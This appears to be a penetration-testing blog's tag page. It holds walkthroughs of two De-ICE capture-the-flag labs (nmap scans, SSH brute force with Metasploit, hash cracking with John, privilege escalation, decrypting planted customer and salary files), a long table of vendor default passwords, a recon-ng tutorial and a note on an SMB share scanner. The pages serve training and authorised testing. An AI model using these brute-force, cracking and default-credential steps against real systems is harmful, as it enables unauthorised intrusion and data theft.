pen test

All posts tagged pen test

While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.

SE-ICE S1.110

Scenario: The scenario for this LiveCD is that a CEO of a small company has tasked you to do more extensive penetration testing of systems within his company. The network administrator has reconfigured systems within his network to meet tougher security requirements and expects you to fail any further penetration attempts. This system is an FTP server used by the network administrator team to create/reload systems on the company intranet. No classified or sensitive information should reside on this server. Through discussion with the administrator, you found out that this server had been used in the past to maintain customer information, but has been sanitized (as opposed to re-built). Prove to the network administrator that proper system configuration is not the only thing critical in securing a server.

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.110.iso

Default IP 192.168.1.110

Flags:
1. create list of open ports
2. create list of users for brute force
3. brute force password for one or more users on an open service
4. Log in using brute force password
5. Perform post exploitation
6. FINAL FLAG: obtain customer credit card information

 

Spoilers and Walkthrough

Change IP – Depending on your configuration you may not need to do this. Log in as root, password is at bottom of page. This assumes that you are using VMWare NAT and XX is the third octet of range you are using.

   ifconfig eth0 192.168.XX.110/24
   route add default gw 192.168.XX.2

Port Scan the System –

   nmap -sV -T4 -O -oX /root/Desktop/deice110 192.168.42.110

Hitting it with a version scan to determine what is running. We are going to output the file as xml and practice using the metasploit database. You can run it all from inside nmap using the db_nmap command and then normal nmap switches but I’m showing you the import function.

   msfconsole
   workspace -a deice
   workspace deice

This creates a database named deice and sets it as the current working

   db_import /root/Desktop/deice110
   hosts

You should see the 110 address. WooHoo!

   services

There should be four ports open. Go check out the website because it has info you need.
adamsa@herot.net
banterb@herot.net
coffeec@herot.net

I love me some FTP, I really love anonymous FTP

   use auxiliary/scanner/ftp/anonymous

Use either use the command line to get access to ftp or filezilla.
I used filezilla and downloaded everything.
The download/etc/shadow seems promising
John can work with the shadow file without unshadowing it.

Running john against it:

   john -rules -wordlist=/usr/share/wordlists/rockyou.txt shadow

john returned a password but it didn’t work.

There is a passwd file in dowload/opt/cygwin/etc but no shadow file so moving along
What is the core file in download/etc?

   file core
   core: ELF 32-bit LSB core file Intel 80386....

Better Google that it is a linux core dump file…go read some on that we’ll wait.

   strings core

The end looks like a dump of a shadow file

   strings core > /root/desktop/deice/coredump

This gives us a working copy on the desktop. I copied out the info and split it at the usernames. If you look at the shadow file from the 100 disk for the normal format; second verse, same as the first.

   john -rules -wordlist=/usr/share/wordlists/rockyou.txt coreshadow

This gives us the following users root, bbanter. SSH to the system and get root.

   ssh to the box as bbanter
   ssh bbanter@192.168.42.110
   su -

From the 100 disk we know that .enc files are encrypted and we are looking for credit card data so why not try to find that again.

   cd /
   find -iname *.enc

That pukes back a lot of things but look at:

   /home/root/.save/customer_account.csv.enc

Jump back to the openssl decrypt if you need help:

   openssl list-cipher-commands
   openssl enc -aes-128-cbc-d -in /home/root/.save/customer_account.csv.enc -out customer_account.csv

WAIT NO JOY!
Lets go look at the /home/root/.save folder

   cd /home/root/.save
   ls

Look at the copy.sh script

   cat copy.sh

This is the script that encrypted the file, the pass is in the “file” section. Lets decrypt it now:

   openssl enc -d -aes-256-cbc -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
   cat customer_account.csv

BOOM you’re done. Openssl is a pain but now you’re a pro.

Account Information

root:Complexity
bbanter:Zymurgy

While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. The De-ICE S1.100 was the first capture the flag type challenge that I ever did. I think I got it from a 2600 Magazine, so it holds a special place in my heart. I would have actually done this initially using BackTrack or PHLAK; PHALK still has the best Tux logo of any distro, RIP PHALK. I lost my original notes so this one is brand new, instead of a few years old like the other versions will be. Have fun and hopefully these are helpful.

SE-ICE S1.100

Scenario: The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities. To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – a old system that only has a web-based list of the company’s contact information. The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.100.iso

Default IP 192.168.1.100

Flags:
1. Create list of open ports
2. Create a list of possible user names
3. Gain access to the file system
4. Elevate to root privileges
5. Discover root password
6. Find sensitive data on the operating system

Spoilers and Walkthrough

I usually start all assessments out with a port scan. This gives me at least an idea of where to start on a black box test. Since I am running this in a local VMWare environment speed isn’t an issue so -T5 it is. I also what to do OS detection and service enumeration so I’m using -A.

nmap -A -p 0-65535 -T5 192.168.1.100
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-05 20:59 EDT
Nmap scan report for caps-dh841pm1(192.168.1.100)
Host is up (0.00025s latency).
Not shown: 65528 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd (broken: could not bind listening IPv4 socket)
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
| ssh-hostkey: 
| 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_ 2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
|_sshv1: Server supports SSHv1
25/tcp open smtp Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.1.128], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
|_imap-capabilities: UNSELECT LOGIN-REFERRALS MAILBOX-REFERRALS LITERAL+ THREAD=REFERENCES NAMESPACE completed IDLE SASL-IR CAPABILITY OK AUTH=LOGINA0001 BINARY IMAP4REV1 STARTTLS MULTIAPPEND SCAN THREAD=ORDEREDSUBJECT SORT
443/tcp closed https
MAC Address: 00:0C:29:1F:C6:F0 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Hosts: slax.example.net, isr-l2g99xz1; OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms caps-dh841pm1 (192.168.1.100)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.09 seconds

To start out I always by looking for low hanging fruit. Since the FTP service looks to be broken, based on the Nmap scan results we will look at the Apache website listening on port 80. From the website there are ten possible users.

Marie Marymarym@herot.net
Pat Patrickpatrickp@herot.net
Terry Thompsonthompsont@herot.net
Ben Benedictbenedictb@herot.net
Erin Gennieggenniege@herot.net
Paul Michaelmichaelp@herot.net
Ester Longlonge@herot.net
Erin Gennieggenniege@herot.net
Paul Michaelmichaelp@herot.net
Ester Longlonge@herot.net
Adam Adamsadamsa@herot.net
Bob Banterbanterb@herot.net
Chad Coffeecoffeec@herot.net

This is where it helps to have either been a sys admin or worked at a few different companies. The two most common username conventions I have encountered are <first>.<last>, <first initial><last>. I’ve also had <employee ID>, <first><last initial>, and worst of all <first 4 of last><first 3 of first>. Because the email addresses are <last><first initial> we will use that and also add root to the list because we know it is a Slax Linux host.

root
Marie.Mary
Pat.Patrick
Terry.Thompson
Ben.Benedict
Erin.Gennieg
Paul.Michael
Ester.Long
Adam.Adams
Bob.Banter
Chad.Coffee
marym
patrickp
thompsont
benedictb
genniege
michaelp
longe
adamsa
banterb
coffeec
mmary
ppatrick
tthompson
bbenedict
egennieg
pmichael
elong
aadams
bbanter
ccoffee

I’ll use metasploit to do the initial check for weak SSH passwords. You can set your options differently this is just a simple test.

msfconsole
use auxiliary/scanner/ssh/ssh_login
set BLANK_PASSWORDS true
set RHOSTS 192.168.1.100
set THREADS 4
set USER_FILE /root/Desktop/de-iceUsers.txt
set USER_AS_PASS true

Look at that! There is nothing better than a shell and you will never forget the first one you get. Mine was a unpatched BIND 9 DNS server.

[+] SSH - Success: 'bbanter:bbanter' 'uid=1001(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux '
ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password: 
Linux 2.6.16.
bbanter@slax:~$ who
bbanter pts/0 Apr 12 14:06 (192.168.1.128)

We only have access to the users group right now so lets see if we can elevate our access manually.

bbanter@slax:~$ cat /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root
floppy::11:root
mail::12:mail
news::13:news
uucp::14:uucp
man::15:
audio::17:
video::18:
cdrom::19:
games::20:
slocate::21:
utmp::22:
smmsp::25:smmsp
mysql::27:
rpc::32:
sshd::33:sshd
gdm::42:
shadow::43:
ftp::50:
pop::90:pop
scanner::93:
nobody::98:nobody
nogroup::99:
users::100:
console::101:
bbanter@slax:~$ cat /etc/passwd
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash

The wheel group is our best bet since in Linux and Unix systems it allows users to run the su command. aadams is a member of the wheel group so we will try to brute force that password, again using metasploit.

set PASS_FILE /usr/share/wordlists/rockyou.txt
set STOP_ON_SUCCESS true
set THREADS 128
set USERNAME aadams
set VERBOSE false
run
****TIME PASSES****
[*] SSH - Starting bruteforce
[+] SSH - Success: 'aadams:nostradamus' 'uid=1000(aadams) gid=10(wheel) groups=10(wheel) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux

We will use the new set of credentials to once again SSH to the system.

aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*

aadams@slax:~$ sudo cat /etc/shadow
Password:
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

John the Ripper can directly attach shadow files so lets try it using the rockyou wordlist. The first one runs a simple set of rules to look for easy passwords, basically so you don’t have to find bbanter again.

john --signle deiceShadow.txt
john --wordlist=/usr/share/wordlists/rockyou.txt de-iceShadow.txt
root:tarot:13553:0:::::
aadams:nostradamus:13550:0:99999:7:::
bbanter:bbanter:13550:0:99999:7:::
ccoffee:hierophant:13550:0:99999:7:::
su -

Now that we are root on the system lets look for sensitive data on the system.

root@slax:/home# ls
aadams/  bbanter/  ccoffee/  ftp/
root@slax:/home# cd ccoffee
root@slax:/home/ccoffee# ls
root@slax:/home/ccoffee# cd ../ftp
root@slax:/home/ftp# ls
incoming/
root@slax:/home/ftp# cd incoming/
root@slax:/home/ftp/incoming# ls
salary_dec2003.csv.enc*

Huh, .enc, google that I bet salary information isn’t supposed to be there. Running strings definitely doesn’t produce readable results.

root@slax:/home/ftp/incoming# strings salary_dec2003.csv.enc | head -10
Salted__n
Lw$A`
YN>7
#ki8
/><b
Wm&/
KU'M
R|T&
@/CP/
    0"Kt

But try googling the Salted__n and see if you can figure out what we might need to do. First, we need to remember the /etc/passwd entry that noted changing the root password would break encryption and second after some research we know that it is encrypted using OpenSSL.

root@slax:/home/ftp/incoming# openssl aes-128-cbc -d -in salary_dec2003.csv.enc -out salary_dec2003.csv
enter aes-128-cbc decryption password:
root@slax:/home/ftp/incoming# strings salary_dec2003.csv | head -10

That is certainly sensitive data! We’ve got all the flag, time to call it a day.

 

In the course of all the penetration tests we have tracked down lots of default passwords. Default passwords are a quick win on most penetration tests but usually don’t get the respect of a good remote code execution. Just because it isn’t sexy doesn’t mean you don’t get access.

This isn’t by any means a complete list but we hope it helps. The table is fairly large so feel free to filter and search. There is a notes field hidden to the right that has some helpful stuff in it but unfortunately it doesn’t fit well.


Default Password List

List of Default Passwords for Penetration Tests.
Device TypeManufacturerModelUsernamePasswordNotes
ApplicationBrocadeSwitch Explorerrootfirbrannehttp://community.brocade.com/docs/DOC-1651
ApplicationBrocadeSwitch Exploreradminpassword
ApplicationFirebirdRDBMSSYSDBAmasterkey
ApplicationHPWebJet Adminadminadmin
ApplicationLantronixUDS1100Telnet
ApplicationSybaseSQLAnywheresa
ApplicationSymantecVPsymantecHash - VPUninstallPassword=S1084A085DC6BD2D755D4D6A7726
ApplicationWyseSQL AdminRapportThinMgmt
ApplicationWyseSQL AdminRapportThinMgmt451
ApplicationWyseFTPrapportr@p8p0r+
ApplicationWyseConsolerootwyse
ApplicationWyseConsoleroot
ApplicationWyseVNCVNCwinterm
ApplicationWyseVNCpassword
BIOSWyseBIOSFireport
InfrastructureAlcatel-LucentWebViewadminswitch
InfrastructureAPCAP9340apcapcadmin access
InfrastructureAPCAP9340deviceapcdevice only access
InfrastructureBlueSocketWireless LAN controlleradminblue
InfrastructureCiscoWireless LAN controlleradminadmin
InfrastructureDaktronicsGalaxyProDakpwdapplication password for FTP over non-standard port. Download software from Daktronics.com
InfrastructureDellPowerVault TL4000adminsecure
InfrastructureMitel3300 ICPsystempassword
InfrastructureMitel3300installer2000Telnet banner is SX-2000, only works for telnet access not web
InfrastructureNortelBusiness Secure RouternnadminPlsChgMe!
InfrastructurePolycomVBP 5300LF2root@#$%^&*!SSH - The password from support is @#$%^&*!() but DES ignores ()
MSSQLTrackit DatabaseInstance: TRACKITsaTI_DB_P@ssw0rdPort 64004
RemoteManagementDellDRACrootcalvin
RemoteManagementDellDRACuser1user1234user1:$1$nVOr80rB$HDAd6FRIG24k/WN4ZuYPC0:0:99999:7::: (not verified)
RemoteManagementHPiLO2adminadmin
WebApp3ComSuper StackmanagermanagerCIH 4400 44.70
WebApp3ComIntelliJack Switch NJ2000password
WebAppAdaptecStorage Managerraidraid
WebAppAlliance Storage TechnologiesUDO Archive Apllianceadminadminhttp://www.plasmontech.com/downloads2/pdf/aaequickstartguide_4_8xx.pdf
WebAppAxis540+/542+
WebAppBay NetworksBayStack 303/304manager
WebAppBoschDiBosAdministratorcase sensitive
WebAppCanonMF8050
WebAppCanoniR-ADV 403576543217654321
WebAppCarrierCNNWebsacarrier
WebAppCheck In SystemsCheck In Systemsmciadminhttp://www.medicalcheckin.com/Technical_Document_for_IT_Departments.pdf
WebAppCimetricBACnetadminadmin
WebAppCisco7936 Cisco IP Conference Stationadministrator**#
WebAppDellPowerVault 124Tadminpassword
WebAppDell2162DSAdmin
WebAppDellEquallogic PSgrpadmingrpadmin
WebAppDigiOneRealPortrootdbps
WebAppEatonPowerwareadminadmin
WebAppEMCNavispherenasadminpassword
WebAppHoneywellNetAXSadminadmin
WebAppHPSystem Management HomepageAdministatorAdministator
WebAppHPHPNASadministratorhpinvent
WebAppHPProcurveprocurvemodel 2501g
WebAppIBMAdvanced System Managementadminadmin
WebAppIBMAdvanced System Managementgeneralgeneral
WebAppIBMBaseboard Management controllerUSERIDPASSW0RDLook for BMC Login. Case sensitive and zero in password not 'oh'
WebAppInFocusLiteShow 3Admin Useradmin
WebAppInFocusLiteShow 3Basic Userbasic
WebAppIntelRemote Management Module 2adminpassword
WebAppIntelNetPort Expressrootworks on telnet or web
WebAppIntermeceasyLAN 100eIntermec
WebAppIntermeceasyLAN 10i2Intermec
WebAppJavaGlassfishadminadminadmin
WebAppKIPPrintNETkipkiptcpwrapped on port 80
WebAppKonica MinoltaPageScopeAdministator12345678bizhub C652
WebAppKyoceraCommand Center RXAdminAdmin
WebAppKyoceraCommand Centeradmin00
WebAppKyoceraHyPASAdminAdmin
WebAppLantronixUDS1100
WebAppLantronixXportadminPASS
WebAppLantronixXPORTlook for ltx_conf.htm
WebAppNEC (Digitcom)Univerge SV8100ADMIN10
WebAppNEC (Digitcom)Univerge SV8100necii47544
WebAppNEC (Digitcom)Univerge SV8100tech12345678
WebAppNEC (Digitcom)Univerge SV8100ADMIN29999
WebAppNEC (Digitcom)Univerge SV8100USER11111
WebAppNetgearGS108Tpassword
WebAppNetgearGS724tppassword
WebAppNetgearProSafenetgearnetgearruns on port 8080
WebAppNetgearGSM7328FSadmin
WebAppNortelBCMnnadminPlsChgMe!Look for BCM login as the prompt
WebAppOKIML590adminOkiLANcase sensitive
WebAppOKIC5200nrootLast 6 of MAC*Capitalize any letters
WebAppOTRSOTRSroot@localhostrootdoc.otrs.org/3.1/en/html/ - look for 'First Login'
WebAppPerleIOLANadminsuperuser
WebAppPolycomVBP 5300LF2rouserdefault
WebAppPrintekPrint Serveraccess
WebAppPrintSirWEBPORT 1.1admin
WebAppPrintSirWEBPORT 1.1adminsu@psir
WebAppPrintSirWEBPORT 1.1admin1234
WebAppRicohAficio SP C811DNadmin
WebAppRicohAficio MP C6000admin
WebAppRicohAficio 2022adminpassword
WebAppSamsungCLX-6250adminsec00000
WebAppSamsungSyncThru Webadminadmin
WebAppSharpMXadminadmin
WebAppSharpARadminSharp
WebAppSharpMX-M363Nadministratoradminhttp://www.lesolsoncompany.com/InstantKB20/KnowledgebaseArticle50144.aspx
WebAppSilexSX-500access
WebAppSpeco TechnologiesWeb Clientadmin1111
WebAppSpectraT50sulook for /gf/startpage.htm
WebAppSymantecEndpoint Protection Manageradminadminhttp://www.symantec.com/connect/forums/endpoint-protection-management-console-credentials-lost
WebAppTandbergRDX quikstationAdminAdmin!case sensitive
WebAppTeradiciPCoIP Zero ClientAdministrator
WebAppWebCTRLWebCTRLadminpassword
WebAppWebCTRLWebCTRLanonymous access
WebAppXeroxWorkCentre 7775admin1111
WebAppXioTechEmprise 5000administratoradministrator
WebAppZebraZebraNetadmin1234
WebAppZebraZTC GK420dadmin1234
WebAppEMC2Cloud Tiering Appliancerootrain
WebAppStratusEverrunadminadmin
WebAppIBMTS7700adminadmin
WebAppCrestonAirmediaadminadmin
WebAppQuantumScaler I40adminpassword
InfrastructureWelch-AllynRETevalrootRETeval-DR 2.5.0
InfrastructureNetAppONTAPadminnetapp!123
WebAppSplunkSplunkadminchangemeport 8000

Creating a Workspace

The workspace is an area that will help keep your reconnaissance organized.  Each workspace has it’s own directory inside the hidden .recon-ng directory in the home directory.

First we will find an organization to recon and build our workspace around this company.  We will use HackerOne to get our company.

This is how Wikipedia describes HackerOne:

HackerOne is a vulnerability coordination and bug bounty platform that connects businesses with cybersecurity researchers (aka, hackers). It is one of the first companies to embrace and utilize crowd-sourced security and hackers as linchpins of its business model, and is the largest cybersecurity firm of its kind.[1]”

Even though we are only performing reconnaissance in a non-intrusive manner, we will use a company from HackerOne’s Directory.  Under the right conditions, this company has agreed to recon and scanning.  We will only be using recon-ng. Figure 1 shows the company we will use in the tutorial but feel free to select a different company from HackerOne or use any one that you are authorized to test against.

HackerOne

Figure 1: HackerOne Company

Figures 2 and 3 show the scope that is authorized for testing including eligible submissions and domains.

Eligible Items

Figure 2: Eligible Items

Allowed Domains

Figure 3: Allowed Domains

workspaces -h shows us the different option we have a available to use (Figure 4).

Workspace -h

Figure 4: Workspace -h

Next we will add our workspace using the following command (Figure 5)

workspaces add
Adding a Workspace

Figure 5: Adding a Workspace

After this command you are automatically placed into your new workspace. workspaces list will show you the status of your workspaces.

List of workspaces

Figure 6: List of workspaces

Next, we will add our company and our domain.  This will add information to the SQLite database. To add information into the database, we need to understand the schema, the layout of the tables. To look at the schema of the database run the following command (Figure 7)

show schema
Show Schema

Figure 7: Show Schema

There are thirteen different tables, we will view the schema of the tables we use in this tutorial.

 add companies

Running the add companies command will make the other columns available.   Press enter if you want to leave that column blank.

Add Company

Figure 8: Add Company

Add the domain using the following command (Figure 9).

add domains
Add Domains

Figure 9: Add Domains

To verify that the domain was added successfully run the command shown in Figure 10.

show domains
List Domains

Figure 10: List Domains

A simple way of thinking about adding to the tables is shown in the next Figure 11.

Table Visualization

Figure 11: Table Visualization

Now that we’ve added data to the database and know how to ensure that data was manually inserted correctly lets move on to importing and exporting data.

Importing Data into the Database

We will uses theHarvester to gather information about United.com and import this into recon-ng’s database.

From Edge Security  http://www.edge-security.com/theharvester.php

“The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.

This tool is intended to help Penetration Testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.”

If theHarvester isn’t already installed, i.e. you aren’t using Kali Linux, you can clone it from here: https://github.com/laramies/theHarvester

theHarvester

Figure 12: theHarvester

We called theHarvester to gather data on domain united.com using all the data sources listed in the help screen.  We directed the output to my recon-ng folder using the ‘>’ operator. The sample command we used follows:

./theHarvester.py -d united.com -b all > ~/recon-ng/harvester.txt

The file name is harvester.txt. This is an ugly file that well will parse through using a few linux utilities. Sample results are shown in the next figure.

Sample Results

Figure 13: Sample Results

The next step is to make this snippet and clean it up a bit with some Linux utilities. We will use grep and AWK to trim the tree.

Grep and AWK

grep is a command-line utility for searching plain-text data sets for lines matching a regular expression.

This is by no means the perfect way.  This is just one of many to get the results you need. Using grep, we will create a list of email addresses from harvester.txt file. (Figure 14)

grep @united.com harvester.txt > united_emails.txt
grep command

Figure 14: grep command

If you are interested in the file contents use the cat command to view file the contents in the terminal

cat united_emails.txt
cat results

Figure 15: cat results

Next, we will create a list of hosts for import from theHarvester results. (Figure 16)

grep ":" harvester.txt
grep host

Figure 16: grep host

Grep will also help create the virtual host list.  Also take note that since “united.com” is the only domain in scope, it becomes part of the command.

grep ":" harvester.txt | grep united.com

The pattern that we wanted to match was “=” and I didn’t want to count the lines after the pattern so I chose to use 200 as my line count after the pattern, as shown in Figure 17.

grep for Virtual Hosts

Figure 17 grep for Virtual Hosts

This command was a little harder to figure out. The pattern that we wanted to match was “=” and I didn’t want to count the lines after the pattern so I chose to use 200 as my line count after the pattern.

grep -A200 "=" harvester.txt | grep united.com > virtual_hosts.txt

It is time to import our information into recon-ng.

Using the show modules command, we get a list of modules broken down by categories. We will use import/list module from the Import category.

show modules
Import Modules

Figure 18: Import Modules

The “show info” command shows the options to use and the table and columns that will be needed for the import.

show info
Show Info

Figure 19: Show Info

To find the column and table, we will use the “show schema” command.  This will give use a list of the Tables and the different columns in each.

show schema
Show Schema

Figure 20: Show Schema

To import email addresses, we will the  “contacts” table and the email column. Our file name will be the united_email.txt file we created using theHarvester. The “set” statement, sets the variables for the import. The “run” command executes the module.

set TABLE contacts
set COLUMN email
set FILENAME united_emails.txt
run
Email Import

Figure 21: Email Import

The “show contacts” command show the data inside the “Contacts Table”. This is a second verification that the data imported correctly.

Show Contacts

Figure 22: Show Contacts

Part 3: Usage and Reporting

Intro

Recon-ng is a Open Source Reconnaissance framework written in Python.  This SQLite database driven tool incorporates Python modules and API Keys to allows itself to be a conduit for many tools ranging from The Harvester to Metasploit.  It is an awesome standalone reconnaissance tool in its own right. As a side note we all totally have a geeky nerd crush on LaNMaSterR53.

This part of the series will take a look at installation, adding API Keys. Later we will show you how to create a Workspace, importing data into the database, and export data for the use with other tools.

For our targets of reconnaissance, we will use HackerOne’s directory of companies.  This is not our way of saying, “Go out and hack these companies” but our way of doing safe recon and provide continuous screenshots.  That will be easy to follow.  This is also our way of introducing you to HackerOne and the Bug Bounty community if you are not already familiar with it.

Getting Started

While most penetration testers will be running this out of Kali Linux the prerequisites (git and pip) may need to be installed before you start. Fortunately, this is easy on most linux flavors and requires just a few simple commands:

sudo apt-get update
sudo apt-get install git
sudo apt-get install python-pip python-dev build-essential
sudo pip install --upgrade pip
sudo pip install --upgrade virtualenv

Next clone Recon-ng from bitbucket (Figure 1). In this tutorial we clone to the Home directory but feel free to use whatever directory structure works for you.

git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
git install

Figure 1: git install

Next, change directory into the newly created recon-ng and list the contents (Figure 2).

cd recon-ng
ls
recon-ng contents

Figure 2: recon-ng contents

We will use the REQUIREMENTS file to finish installing the dependencies for recon-ng.

pip install -r REQUIREMENTS

At this point the installation is almost ready to use, we will go over a little bit of information now while you’re still paying attention and then get recon-ng running and the API keys loaded.

The installation of recon-ng also created a .recon-ng a hidden directory inside your home directory.  This directory is empty.  This is where your key.db and your workspaces will be created. After logging into recon-ng for the first time, a directory and the keys.db is entered in the hidden .recon-ng directory (Figure 3).

.recon-ng directory

Figure 3: .recon-ng directory

To run recon-ng, go to the folder where you ran the “git clone” command. This is where the magic happens.

cd recon-ng 
./recon-ng

Don’t worry if you get the “_api key not set error” (Figure 4).  We have not added any API keys yet.

Initial Start

Figure 4: Initial Start

From our screen, we can see that there are 76 Recon modules, 8 Reporting modules, 2 Import modules, 2 Exploitation modules, and 2 Discovery modules.  We are also using the “default” workspace. (Figure 5)

Recon-ng start screen

Figure 5: Recon-ng start screen

Close recon-ng and lets look at the modules and the underlying code. (Figure 6)

cd modules
cd recon
ls
Module Directory

Figure 6: Module Directory

If we go inside the module directory and inside a module, we can see the Python script that does all the magic. (Figure 7)

Module Content

Figure 7: Module Content

Adding API Keys

As I said in the introduction, this is a database driven tool.  Now it’s time to add information into the database.

The API keys are used by the modules to gather information for the SQLite database.  Some of the API keys are free but some can be expensive.  I will keep this tutorial to the free API keys that are available.

After going back into the recon-ng directory and typing “./recon-ng”, you will be inside the recon-ng console. (Figure 8)

keys list
Keys List

Figure 8: Keys List

The following command is an example of adding the shodan_api key. (Bottom of Figure 8, Look close it is there)

keys add shodan_api <paste key here>

API Keys Signup URLs

Signing up for the API keys is the least fun and most time consuming part of the setup. Showing each signup would be lethally boring so here are the list of URLs. All links open in a new window because we are thoughtful like that.

Google API – https://console.developers.google.com/apis/library
Bing API – https://msdn.microsoft.com/en-us/library/bing-ads-getting-started.aspx
Facebook API – https://developers.facebook.com/docs/apis-and-sdks
Instragram API – https://www.programmableweb.com/api/instagram
Linkedin API – https://developer.linkedin.com/docs/rest-api
Shodan API – https://developer.shodan.io/
Twitter API – https://apps.twitter.com/


Part 2: Workspaces and Importing Data

This PowerShell script, written by our friend Rafael Montoya, will allow you to scan open shares based on a list you provide or a subnet you enter. It will process hostnames or IP addresses and attempt to connect to the shares on a machine using WMI to make the connection.

Using PowerShell it will call the Get-WMIObject with the Class of Win32_ConnectionShare and it can be modified to allow more properties that can be listed. The current properties that are listed are PSComputerName, Name, Path and Description.

For use with subnets and cidr notation the GET-IPRange will currently list out the IP addresses in the subnet that was entered. For a /24 it will list out all 254 usable addresses and scan those IPs for a SMB share.

